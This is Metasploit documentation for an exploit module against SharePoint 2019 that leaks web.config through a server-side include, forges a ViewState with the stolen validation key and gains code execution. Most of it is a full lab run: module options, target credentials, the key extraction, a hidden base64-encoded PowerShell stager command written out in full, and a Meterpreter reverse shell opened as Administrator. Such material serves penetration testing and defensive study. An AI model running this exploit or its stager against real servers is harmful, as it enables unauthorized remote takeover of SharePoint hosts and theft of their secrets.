metasploit-framework/documentation/modules/exploit/windows/http/sharepoint_ssi_viewstate.md

Vulnerable Application

Description

This module exploits a server-side include (SSI) in SharePoint to leak the web.config file and forge a malicious ViewState with the extracted validation key.

This exploit is authenticated and requires a user with page creation privileges, which is a standard permission in SharePoint.

The web.config file will be stored in loot once retrieved, and the VALIDATION_KEY option can be set to short-circuit the SSI and trigger the ViewState deserialization.

Tested against SharePoint 2019 on Windows Server 2016.

Setup

Follow Microsoft's documentation.

Verification Steps

Follow Setup and Scenarios.

Targets

Windows Command

This executes a Windows command.

Windows Dropper

This uses a Windows dropper to execute code.

PowerShell Stager

This uses a PowerShell stager to execute code.

Options

HttpUsername

Set this to the SharePoint username.

HttpPassword

Set this to the SharePoint password.

VALIDATION_KEY

Set this to the ViewState validation key if you have it.

COOKIE

Set this to a SharePoint cookie if you have one. This is primarily useful for form auth.

Scenarios

SharePoint 2019 on Windows Server 2016

msf6 > use exploit/windows/http/sharepoint_ssi_viewstate
[*] Using configured payload windows/x64/meterpreter/reverse_https
msf6 exploit(windows/http/sharepoint_ssi_viewstate) > options

Module options (exploit/windows/http/sharepoint_ssi_viewstate):

   Name            Current Setting  Required  Description
   ----            ---------------  --------  -----------
   COOKIE                           no        SharePoint cookie if you have one
   HttpPassword                     no        SharePoint password
   HttpUsername                     no        SharePoint username
   Proxies                          no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS                           yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT           80               yes       The target port (TCP)
   SRVHOST         0.0.0.0          yes       The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresses.
   SRVPORT         8080             yes       The local port to listen on.
   SSL             false            no        Negotiate SSL/TLS for outgoing connections
   SSLCert                          no        Path to a custom SSL certificate (default is randomly generated)
   TARGETURI       /                yes       Base path
   URIPATH                          no        The URI to use for this exploit (default is random)
   VALIDATION_KEY                   no        ViewState validation key
   VHOST                            no        HTTP server virtual host


Payload options (windows/x64/meterpreter/reverse_https):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST                      yes       The local listener hostname
   LPORT     8443             yes       The local listener port
   LURI                       no        The HTTP Path


Exploit target:

   Id  Name
   --  ----
   2   PowerShell Stager


msf6 exploit(windows/http/sharepoint_ssi_viewstate) > set rhosts 192.168.123.237
rhosts => 192.168.123.237
msf6 exploit(windows/http/sharepoint_ssi_viewstate) > set httpusername Administrator
httpusername => Administrator
msf6 exploit(windows/http/sharepoint_ssi_viewstate) > set httppassword Passw0rd!
httppassword => Passw0rd!
msf6 exploit(windows/http/sharepoint_ssi_viewstate) > set lhost 192.168.123.1
lhost => 192.168.123.1
msf6 exploit(windows/http/sharepoint_ssi_viewstate) > run

[*] Started HTTPS reverse handler on https://192.168.123.1:8443
[*] Executing automatic check (disable AutoCheck to override)
[+] The target appears to be vulnerable. SharePoint 16.0.0.10337 is a vulnerable build.
[*] Creating page for SSI: /z0zL8ruBOIcdq7aVekdlh.aspx
[+] Successfully created page
[*] Leaking web.config
[+] Saved web.config to /Users/wvu/.msf4/loot/20201015131428_default_192.168.123.237_web.config_940022.txt
[+] ViewState validation key: FEF7456DF90E1A6B7CA04D00ED56228602E2AF3C94B7A34F7735D5AFC340C9E4
[*] Deleting /z0zL8ruBOIcdq7aVekdlh.aspx
[+] Successfully deleted page
[*] Executing PowerShell Stager for windows/x64/meterpreter/reverse_https
[*] Powershell command length: 2918
[*] Executing command: powershell.exe -nop -w hidden -noni -c "if([IntPtr]::Size -eq 4){$b=$env:windir+'\sysnative\WindowsPowerShell\v1.0\powershell.exe'}else{$b='powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-noni -nop -w hidden -c &([scriptblock]::create((New-Object System.IO.StreamReader(New-Object System.IO.Compression.GzipStream((New-Object System.IO.MemoryStream(,[System.Convert]::FromBase64String(''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''))),[System.IO.Compression.CompressionMode]::Decompress))).ReadToEnd()))';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s);"
[+] Successfully executed command
[*] https://192.168.123.1:8443 handling request from 192.168.123.237; (UUID: 8g4qnmlb) Staging x64 payload (201308 bytes) ...
[*] Meterpreter session 1 opened (192.168.123.1:8443 -> 192.168.123.237:62885) at 2020-10-15 13:15:00 -0500

meterpreter > getuid
Server username: GIBSON\Administrator
meterpreter > sysinfo
Computer        : WIN-G2PGASM3QFA
OS              : Windows 2016+ (10.0 Build 14393).
Architecture    : x64
System Language : en_US
Domain          : GIBSON
Logged On Users : 18
Meterpreter     : x64/windows
meterpreter >